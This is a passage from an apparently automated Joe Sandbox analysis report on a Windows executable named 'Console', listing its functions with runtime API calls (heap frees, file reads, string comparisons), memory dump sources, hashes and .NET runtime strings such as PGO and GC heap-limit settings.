                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalLeaveSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3988221542-0
                                                                                                                                                                                                                          • Opcode ID: 3d8505328a3470d9926ca441ce94d1b066ce6accc71ca0b445516ed0cb78ef73
                                                                                                                                                                                                                          • Instruction ID: 417462a7fe5b9843457179972cd2b45ee5f77d3649217fbc37e9b0a826938567
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d8505328a3470d9926ca441ce94d1b066ce6accc71ca0b445516ed0cb78ef73
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58218D75A006059FCB20CF69D985B9AFBB4FF59720F14825EEC18A7391D7359900DBE0
                                                                                                                                                                                                                          Function 012D40A0 Relevance: 1.3, APIs: 1, Instructions: 80memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,016445B0,00000000,00000000,00000000,00000000,00000000), ref: 012D4136
                                                                                                                                                                                                                            • Part of subcall function 012CCB10: LeaveCriticalSection.KERNEL32(00000000,7CAB6A82,?), ref: 012CCB9E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalFreeHeapLeaveSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 681598451-0
                                                                                                                                                                                                                          • Opcode ID: 34521455557d2ea74a098c31a3fcc00d48131673477332907f3c9d32d3ed93e1
                                                                                                                                                                                                                          • Instruction ID: 09d7e5b7baf57ab25ac121603779e860b6e5105fb6cd5f7f8d47201093b82f71
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34521455557d2ea74a098c31a3fcc00d48131673477332907f3c9d32d3ed93e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD21463372051A5BCB21BEA8DC01EABB758EFA5661F00021AFF1497290EA31C82197D1
                                                                                                                                                                                                                          Function 012B6050 Relevance: 1.3, APIs: 1, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012C2FD0: HeapFree.KERNEL32(00000000,015A58D0,00000000), ref: 012C3068
                                                                                                                                                                                                                            • Part of subcall function 012C8E60: HeapFree.KERNEL32(00000000,015A9D08,00000000), ref: 012C8EF8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,015A9CB8,00000000), ref: 012B60F2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                          • Opcode ID: ca605a8074d5e4f23169343e0b3fa13b8ac6f2dc215b1b0f1d03ae4819765743
                                                                                                                                                                                                                          • Instruction ID: 73d51f8f247dff9f094ed9507f7cd44b9ff1e3d776212c6afb253a30104050ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca605a8074d5e4f23169343e0b3fa13b8ac6f2dc215b1b0f1d03ae4819765743
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77214F70A90309ABFB24DF94DD46BAE7AB1EB00B04F208519B7117F2C4CBF529148B95
                                                                                                                                                                                                                          Function 05AAD070 Relevance: 1.3, APIs: 1, Instructions: 70sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1628315508.0000000005AA0000.00000020.00001000.00040000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5aa0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                          • Opcode ID: 9643b01f5b22798312f3a04d117c65c74d11b886562e64580215059b41070737
                                                                                                                                                                                                                          • Instruction ID: 9ba9dadc952de56145ab21c4c1e75aed9e86236da7071e542e35581cd3b577e0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9643b01f5b22798312f3a04d117c65c74d11b886562e64580215059b41070737
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05213D72B002095FCB19BBAC85A47EEBBE6DB94384F14412DD253EB7C0CB66D845C7A1
                                                                                                                                                                                                                          Function 0CB47590 Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1634866215.000000000CB40000.00000020.00001000.00040000.00000000.sdmp, Offset: 0CB40000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_cb40000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                          • Opcode ID: 37ad04838893702ef1c6b6c5f1e7e545458d8436c2f48196086347ab3368b66b
                                                                                                                                                                                                                          • Instruction ID: b57d0a48d93a96204ca7cc43ddab0a2ddf679c1b038d508034564e80407829e0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37ad04838893702ef1c6b6c5f1e7e545458d8436c2f48196086347ab3368b66b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1511C271B043499BCB249BAD88847DEBBE5EB54358F10807AD505EB340DB76E948C792
                                                                                                                                                                                                                          Function 01418E90 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01649F60,7CAB6A82,00000000), ref: 01418EE0
                                                                                                                                                                                                                            • Part of subcall function 01418480: GetSystemInfo.KERNEL32(0163F09C,7CAB6A82,00000000,?,00000000), ref: 0141850C
                                                                                                                                                                                                                            • Part of subcall function 01418480: SetConsoleCtrlHandler.KERNEL32(01418330,00000001,?,00000000), ref: 0141852D
                                                                                                                                                                                                                            • Part of subcall function 01418480: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 01418538
                                                                                                                                                                                                                            • Part of subcall function 01418480: GetProcAddress.KERNEL32(00000000,InitializeContext2), ref: 01418544
                                                                                                                                                                                                                            • Part of subcall function 01418480: GetModuleHandleW.KERNEL32(ntdll.dll,?,00000000), ref: 01418554
                                                                                                                                                                                                                            • Part of subcall function 01418480: GetProcAddress.KERNEL32(00000000,RtlRestoreContext), ref: 01418566
                                                                                                                                                                                                                            • Part of subcall function 01418480: InitializeCriticalSection.KERNEL32(0163EE00,?,00000000), ref: 014185B4
                                                                                                                                                                                                                            • Part of subcall function 01418480: InitializeCriticalSection.KERNEL32(0163EE24,?,00000000), ref: 014185E5
                                                                                                                                                                                                                            • Part of subcall function 01418480: InitializeCriticalSection.KERNEL32(0163EAD0,?,00000000), ref: 01418616
                                                                                                                                                                                                                            • Part of subcall function 01418480: InitializeCriticalSection.KERNEL32(0163EFC8,?,00000000), ref: 01418649
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalInitializeSection$AddressHandleModuleProc$ConsoleCtrlHandlerInfoSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 722453380-0
                                                                                                                                                                                                                          • Opcode ID: 38ade9719935b8d1a6bc957c3341e82f4cde32ff029fdba02dd0718e1019d7ac
                                                                                                                                                                                                                          • Instruction ID: 4d80d0d106a4d1dcc8c4e0af95906f8198bb187acde49b9ee8c91b1f693b7dc7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38ade9719935b8d1a6bc957c3341e82f4cde32ff029fdba02dd0718e1019d7ac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B70192759803089FD760DF6DDC85B9ABBB4F709718F20016EE402E3294D7755410CBA0
                                                                                                                                                                                                                          Function 03B232A8 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1627464403.0000000003B23000.00000020.00001000.00040000.00000000.sdmp, Offset: 03B23000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_3b23000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 64a3d89e2b4280f277ccdf991ab431d1553d66ef699c6d8506194e8df314b9a0
                                                                                                                                                                                                                          • Instruction ID: f2b79ea81e7a6844604aeeb47116d9d21496f2e103a66576fe1a5ab7bf46915d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64a3d89e2b4280f277ccdf991ab431d1553d66ef699c6d8506194e8df314b9a0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DB02B2C60831A11C114505D54407653ACD47C122CF8440FCA40C02402859DC4D440D0
                                                                                                                                                                                                                          Function 03B232B2 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1627464403.0000000003B23000.00000020.00001000.00040000.00000000.sdmp, Offset: 03B23000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_3b23000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d553b8bc499041ae0542272d96d7c22c1fb1b6aed5bd12edbdc0a5990b99ba16
                                                                                                                                                                                                                          • Instruction ID: a2f3f114601681f1bdfe67e8b17769e810b03c7bc28c1d25303b6ee47f9ba095
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d553b8bc499041ae0542272d96d7c22c1fb1b6aed5bd12edbdc0a5990b99ba16
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00A0026A24831D66540075E7794287B775D85D1A74550886EE64C079011866A47510B9

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 010633A0 Relevance: 60.2, APIs: 25, Strings: 9, Instructions: 708memorystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000,7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AF0F
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0159E42C,7CAB6A82,00000000,00000000,?,C0000000,014C57BD,000000FF), ref: 01063481
                                                                                                                                                                                                                          • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000,000000FF), ref: 010634CF
                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 01064010
                                                                                                                                                                                                                            • Part of subcall function 010688C0: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,000000FF,?,00000000,010634F8,?,010634F8,?,*** START PGO Data, max index = %u ***,?), ref: 010688E2
                                                                                                                                                                                                                          • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00FC0000), ref: 01063511
                                                                                                                                                                                                                          • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000), ref: 01063FA6
                                                                                                                                                                                                                            • Part of subcall function 01063320: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,000000FF,00000000,00000000), ref: 01063343
                                                                                                                                                                                                                            • Part of subcall function 01063320: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 01063357
                                                                                                                                                                                                                            • Part of subcall function 01063320: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,000000FF,00000000), ref: 0106337B
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01063676
                                                                                                                                                                                                                          • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,00000000), ref: 010636EF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010638A3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010638D1
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01063962
                                                                                                                                                                                                                          • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00004000,?,?), ref: 0106381C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01063A2E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01063B23
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TypeHandle: ,0000000C), ref: 01063BB8
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 01063BD0
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NULL), ref: 01063C13
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,UNKNOWN), ref: 01063C2C
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 01063C3F
                                                                                                                                                                                                                            • Part of subcall function 00FCDFF0: HeapFree.KERNEL32(00000000,?,?,?,?,?,00FCE09A,?,?,00000004,00000000,00FC0000,00000001,?,?,0122C9D1), ref: 00FCE038
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01063FD9
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01063FFF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,?,C0000000,014C57BD,000000FF), ref: 01064046
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$fgets$_errnostrcmpstrlen$AllocateProcess__stdio_common_vsscanf_wfopenfclosemallocstrncmpwcstoul
                                                                                                                                                                                                                          • String ID: %u$%u %u$*** START PGO Data, max index = %u ***$@@@ codehash 0x%08X methodhash 0x%08X ilSize 0x%08X records 0x%08X$NULL$None$Schema InstrumentationKind %u ILOffset %u Count %u Other %u$TypeHandle: $UNKNOWN
                                                                                                                                                                                                                          • API String ID: 1772327721-2398891802
                                                                                                                                                                                                                          • Opcode ID: 7da501a7a463df02303e49af101c0aff3511a8d85db1313e2243f7397314a20e
                                                                                                                                                                                                                          • Instruction ID: 3f55746225239bd064244489e7860592e5fe96c5c746b74e33f8afdf0da01be9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7da501a7a463df02303e49af101c0aff3511a8d85db1313e2243f7397314a20e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 646256F1E012288BEB30DF58DD44BD9BBB8BB54305F4541D9EA49A7290E7349B84CF98
                                                                                                                                                                                                                          Function 010DC750 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 327stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(HeapVerify,GCLOHThreshold,00000000,00000000,00FC0000), ref: 010DC773
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(HeapVerify,GCHeapHardLimit), ref: 010DC7C9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strcmp
                                                                                                                                                                                                                          • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCLOHThreshold$HeapVerify
                                                                                                                                                                                                                          • API String ID: 1004003707-1810996416
                                                                                                                                                                                                                          • Opcode ID: f941595642caf837491aa8f4b310eca1e099f67322a1b74e03604373978932a4
                                                                                                                                                                                                                          • Instruction ID: 3f9288a9d1ce5270c1284c71b73c3ebb2075f6c13d0a3f0d8fae47ab710ab79d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f941595642caf837491aa8f4b310eca1e099f67322a1b74e03604373978932a4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FB104B5A40304CFD720CF69FD85A69B7F0FB64321F5041AED95AD7290E7316861CB52
                                                                                                                                                                                                                          Function 012DA460 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 298COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: GetCommandLineW.KERNEL32(00000000,00000000,?,?,?,012D9EF0,?,00000000), ref: 012D67E7
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 012D685F
                                                                                                                                                                                                                            • Part of subcall function 012D67D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012DAC36), ref: 012D6882
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 012DA49D
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA4AD
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 012DA4C9
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA4D8
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA535
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA543
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA551
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA562
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA573
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA584
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012DA5BE
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA5D5
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,Windows,000000FF,00000000,00000000), ref: 012DA5F8
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA603
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,012DAF5F), ref: 012DA670
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
